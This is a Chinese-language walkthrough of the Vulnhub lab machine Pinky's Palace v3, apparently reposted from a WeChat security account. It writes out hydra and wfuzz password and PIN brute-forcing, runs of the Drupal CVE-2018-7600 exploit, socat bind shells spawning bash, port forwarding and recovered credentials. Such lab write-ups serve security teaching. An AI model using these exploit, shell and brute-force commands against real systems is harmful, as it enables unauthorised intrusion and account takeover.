Vulnhub-PrinkysPalacev3

admin 2025年4月8日00:05:06评论1 views字数 2903阅读9分40秒阅读模式

Vulnhub-PrinkysPalacev3

1、主机发现

arp-scan -l 扫描同网段Vulnhub-PrinkysPalacev3

2、端口扫描

nmap -sS -sV 192.168.66.185 nmap -sS -A -T4 -p- 192.168.66.185 nmap --script=vuln 192.168.66.185Vulnhub-PrinkysPalacev3

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
5555/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
8000/tcp open  http    nginx 1.10.3
这里简略扫描一下端口,简单分析一下,8000端口有个网页,5555像是ssh,21端口tcp,我们先尝试tcp匿名访问

21端口匿名访问

这里匿名访问用户名为anonymous,密码为空密码或任意密码即可登录

Vulnhub-PrinkysPalacev3这里我们打开了一个文档,我们来看一下说的什么,希望我们尽量避开一些工具,这里有个Pinky可能是用户名,先保留下来 这里是有一个防火墙配置规则Vulnhub-PrinkysPalacev3

访问8000端口

Vulnhub-PrinkysPalacev3这里有个用户名,我们有几种方法来进入这个后台,首先就是hydra爆破一下后台,sql注入尝试或者看下源代码 我们先sql注入一下,这里sql注入应该是失败了我们爆破一下后台

hydra -l pinkadmin -P /usr/share/wordlists/rockyou.txt 192.168.66.185 http-post-form "http://192.168.66.185:8000:user=^USER^&pass=^PASS^:error"

Vulnhub-PrinkysPalacev3这里源代码有些小惊喜

Vulnhub-PrinkysPalacev3这里我们知道靶机的一个服务版本,找找exp吧

3、目录扫描

gobuster dir -u http://192.168.66.185:8000 -t30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dirsearch -u http://192.168.66.185:8000/ -e * -i 200 nikto -h 192.168.66.185 -p 8000

Vulnhub-PrinkysPalacev3
Vulnhub-PrinkysPalacev3

这里像是出货了的样子,我们先放一边

4、指纹识别

Vulnhub-PrinkysPalacev3

5、寻找exp

Vulnhub-PrinkysPalacev3

Vulnhub-PrinkysPalacev3这里在github是可以找到的,我们下载一下

Vulnhub-PrinkysPalacev3

Vulnhub-PrinkysPalacev3这里github和exp都提示我们这个相关漏洞,我们下载exp的吧

Vulnhub-PrinkysPalacev3sudo gem install highline,记得下载这个插件,然后ruby执行44449.rb 这里我们直接就可以得到一个shell

Vulnhub-PrinkysPalacev3试试github的expVulnhub-PrinkysPalacev3到这里我们要转换其他思路了,socat建立连接,之前我们找到了一个防火墙配置文件,大概率要绕过去了

Vulnhub-PrinkysPalacev3
靶机执行
python cve-2018-7600-drupal7.py -t 192.168.66.185 -c "which socat" -p 8000
python cve-2018-7600-drupal7.py -t 192.168.66.185 -c "socat TCP-LISTEN:4444,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000
kali执行
socat FILE:`tty`,raw,echo=0 TCP:192.168.247.166:4444

6、隧道建立

python3 cve-2018-7600-drupal7.py -t 192.168.66.185 -c "socat TCP-LISTEN:4488,reuseaddr,fork, EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000 因为这个exp脚本可以执行命令来监听一个4488端口,使用socat来绕过防火墙

Vulnhub-PrinkysPalacev3
python3 cve-2018-7600-drupal7.py -t 192.168.66.185 -c "socat TCP-LISTEN:4488,reuseaddr,fork, EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000
socat FILE:`tty`,raw,echo=0 TCP:192.168.66.185:4488
Vulnhub-PrinkysPalacev3

这里找到了一串sql密码,dpink、drupinkVulnhub-PrinkysPalacev3我们尝试一下

7、尝试提权

Vulnhub-PrinkysPalacev3

Vulnhub-PrinkysPalacev3pinkadminDDLlBhU7uSuGiPBv1gqEL1QDM1G2Nf3SQOXQ6TT7zsAE3IBZAgup

Vulnhub-PrinkysPalacev3
这里查看一下端口信息,80和65534是本地监听,我们端口转发
socat TCP-LISTEN:4499,fork TCP:127.0.0.1:80 &
socat TCP-LISTEN:4466,fork TCP:127.0.0.1:65334 &
这里就是把80端口、65334端口用4499、4466转发

Vulnhub-PrinkysPalacev3这里我们爆破一下 使用crunch命令生成指定范围内的爆破字典文件为暴力破解做准备 crunch 3 5 -f /usr/share/crunch/charset.lst lalpha -o pinkdbcrunsh gobuster dir -u http://192.168.66.185:4466 -w pinkdbcrunsh -x db

Vulnhub-PrinkysPalacev3这里爆出来一个目录,我们访问一下

Vulnhub-PrinkysPalacev3我们把这些密码放到文档里当作密码字典,把我们cat /etc/passwd的用户作为登录字典来扫一下,其实账号密码不算特别多,手动输入也可以 wfuzz -c -z file,./user.txt -z file,./pwds.txt -d 'user=FUZZ&pass=FUZ2Z&pin=22222' http://192.168.66.185:4499/login.php

Vulnhub-PrinkysPalacev3爆出来了,用户名和密码,我们登录一下 但是看了网上的wp,这里的pin我们还要爆破一下 需要一个pin值,并且是5位纯数字,那么我们可以使用crunch进行生成5位纯数字字典 首先生成纯5位数字的pin码

这里我第一次遇到pin这个东西,学到了

crunch 5 5 -f /usr/share/crunch/charset.lst numeric -o pin.txt
wfuzz -t 150 -w pin -c -d "user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ"  http://192.168.247.166:8888/login.php

Vulnhub-PrinkysPalacev3我们拿着这三个信息登录一下

Vulnhub-PrinkysPalacev3一个命令执行模块

Vulnhub-PrinkysPalacev3或许可以尝试以下nc连接,但是这个靶机有防火墙,我们需要socat连接 命令框输入

socat TCP-LISTEN:6666,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
kali执行
socat FILE:`tty`,raw,echo=0 TCP:192.168.66.185:6666
Vulnhub-PrinkysPalacev3

Vulnhub-PrinkysPalacev3这条命令是将bin文件丢到html,也就是我们可以访问的页面

Vulnhub-PrinkysPalacev3我们执行了之后需要一个so文件

Vulnhub-PrinkysPalacev3查看函数,这个so文件的函数

原文始发于微信公众号(泷羽Sec-朝阳):Vulnhub-PrinkysPalacev3

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月8日00:05:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-PrinkysPalacev3http://cn-sec.com/archives/3912104.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息